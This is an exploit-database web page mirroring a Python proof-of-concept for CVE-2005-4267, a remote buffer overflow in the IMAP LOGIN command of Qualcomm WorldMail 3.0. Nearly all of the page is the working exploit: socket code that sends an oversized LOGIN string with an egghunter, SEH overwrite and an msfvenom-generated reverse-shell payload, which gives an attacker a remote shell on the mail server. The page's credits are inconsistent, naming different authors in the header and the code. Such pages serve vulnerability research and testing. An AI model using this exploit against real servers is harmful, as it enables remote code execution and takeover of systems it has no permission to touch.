Advertisement






Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command

CVE Category Price Severity
CVE-2005-4267 CWE-119 Unknown High
Author Risk Exploitation Type Date
Cesar Cerrudo High Remote 2020-06-13
CPE
cpe:cpe:/a:qualcomm:worldmail:3.0.039:imapd
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060053

Below is a copy:

Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Exploit Title: Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command
# Buffer overflow in Qualcomm WorldMail 3.0 and earlier allows remote attackers to execute arbitrary code via a long character "}" request in LOGIN.
# Exploit Author: Sarang Tumne @SarT
# Date: 13th June, 2020
# CVE ID: CVE-2005-4267
# Confirmed on release 3.0
# Vendor: https://www.qualcomm.com/

###############################################

import socket
import time

a=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

a.connect(("192.168.56.112",143))
buffer="A"*687
buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
buffer+="B"*50
buffer+="\xEB\xb6\x90\x90"  #nseh
buffer+="\xe7\xb2\x0d\x60"  #PPR
#buffer+="\x90"*30
buffer+="w00tw00t"
buffer+="\x90"*40
buffer+=("\x89\xe1\xdb\xc2\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" #msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f c -b "\x00\x0a\x0d" EXITFUNC=seh -e x86/alpha_mixed
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x48\x68\x6c\x42\x35\x50\x65\x50\x53\x30\x75\x30\x4c"
"\x49\x6a\x45\x46\x51\x39\x50\x55\x34\x6e\x6b\x56\x30\x50\x30"
"\x4c\x4b\x50\x52\x66\x6c\x4e\x6b\x32\x72\x76\x74\x4c\x4b\x31"
"\x62\x67\x58\x64\x4f\x78\x37\x42\x6a\x51\x36\x75\x61\x59\x6f"
"\x6e\x4c\x45\x6c\x65\x31\x53\x4c\x54\x42\x54\x6c\x37\x50\x4f"
"\x31\x48\x4f\x34\x4d\x55\x51\x39\x57\x38\x62\x4a\x52\x53\x62"
"\x53\x67\x6c\x4b\x56\x32\x72\x30\x4c\x4b\x31\x5a\x77\x4c\x4e"
"\x6b\x30\x4c\x67\x61\x34\x38\x4d\x33\x47\x38\x37\x71\x6e\x31"
"\x33\x61\x6c\x4b\x73\x69\x61\x30\x56\x61\x69\x43\x4e\x6b\x47"
"\x39\x44\x58\x49\x73\x77\x4a\x50\x49\x6c\x4b\x64\x74\x4c\x4b"
"\x77\x71\x39\x46\x75\x61\x69\x6f\x6c\x6c\x7a\x61\x68\x4f\x54"
"\x4d\x55\x51\x78\x47\x37\x48\x39\x70\x71\x65\x4c\x36\x75\x53"
"\x73\x4d\x78\x78\x47\x4b\x33\x4d\x44\x64\x61\x65\x58\x64\x51"
"\x48\x4e\x6b\x70\x58\x74\x64\x55\x51\x79\x43\x70\x66\x6c\x4b"
"\x64\x4c\x52\x6b\x4c\x4b\x30\x58\x77\x6c\x55\x51\x6b\x63\x6c"
"\x4b\x36\x64\x6e\x6b\x36\x61\x68\x50\x4f\x79\x63\x74\x67\x54"
"\x61\x34\x51\x4b\x61\x4b\x50\x61\x70\x59\x63\x6a\x36\x31\x79"
"\x6f\x59\x70\x63\x6f\x63\x6f\x52\x7a\x6e\x6b\x72\x32\x6a\x4b"
"\x6c\x4d\x63\x6d\x43\x58\x74\x73\x47\x42\x67\x70\x37\x70\x72"
"\x48\x44\x37\x30\x73\x76\x52\x61\x4f\x33\x64\x55\x38\x42\x6c"
"\x53\x47\x56\x46\x37\x77\x4b\x4f\x5a\x75\x68\x38\x6c\x50\x46"
"\x61\x35\x50\x57\x70\x56\x49\x39\x54\x32\x74\x46\x30\x43\x58"
"\x46\x49\x4f\x70\x32\x4b\x47\x70\x49\x6f\x69\x45\x62\x70\x32"
"\x70\x70\x50\x72\x70\x71\x50\x62\x70\x67\x30\x42\x70\x51\x78"
"\x5a\x4a\x74\x4f\x39\x4f\x6d\x30\x59\x6f\x69\x45\x4a\x37\x53"
"\x5a\x44\x45\x33\x58\x49\x50\x6c\x68\x55\x68\x50\x6c\x52\x48"
"\x34\x42\x45\x50\x62\x31\x71\x4c\x6c\x49\x48\x66\x43\x5a\x74"
"\x50\x61\x46\x52\x77\x61\x78\x6c\x59\x4c\x65\x33\x44\x51\x71"
"\x49\x6f\x48\x55\x4e\x65\x49\x50\x71\x64\x76\x6c\x4b\x4f\x32"
"\x6e\x45\x58\x54\x35\x78\x6c\x70\x68\x6c\x30\x38\x35\x59\x32"
"\x61\x46\x6b\x4f\x79\x45\x72\x48\x52\x43\x42\x4d\x32\x44\x55"
"\x50\x6d\x59\x6a\x43\x42\x77\x32\x77\x32\x77\x75\x61\x48\x76"
"\x42\x4a\x72\x32\x42\x79\x73\x66\x68\x62\x49\x6d\x35\x36\x4a"
"\x67\x31\x54\x77\x54\x75\x6c\x46\x61\x37\x71\x4c\x4d\x53\x74"
"\x47\x54\x56\x70\x38\x46\x35\x50\x57\x34\x63\x64\x56\x30\x51"
"\x46\x53\x66\x42\x76\x77\x36\x36\x36\x30\x4e\x46\x36\x51\x46"
"\x51\x43\x51\x46\x45\x38\x62\x59\x78\x4c\x75\x6f\x4e\x66\x79"
"\x6f\x4b\x65\x4c\x49\x49\x70\x30\x4e\x76\x36\x62\x66\x6b\x4f"
"\x74\x70\x42\x48\x63\x38\x4e\x67\x47\x6d\x63\x50\x79\x6f\x4e"
"\x35\x6f\x4b\x49\x6e\x56\x6e\x54\x72\x48\x6a\x72\x48\x49\x36"
"\x6e\x75\x4d\x6d\x4d\x4d\x39\x6f\x4e\x35\x75\x6c\x63\x36\x63"
"\x4c\x46\x6a\x6b\x30\x59\x6b\x69\x70\x43\x45\x36\x65\x4d\x6b"
"\x51\x57\x52\x33\x64\x32\x72\x4f\x70\x6a\x45\x50\x33\x63\x39"
"\x6f\x4a\x75\x41\x41")
#buffer+="\x90"*40

junk=("}")*300
#buffer+="B"*4
#buffer+="C"*500
a.send("A001 LOGIN "+buffer+junk+"\r\n")

print a.recv(50000)
a.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum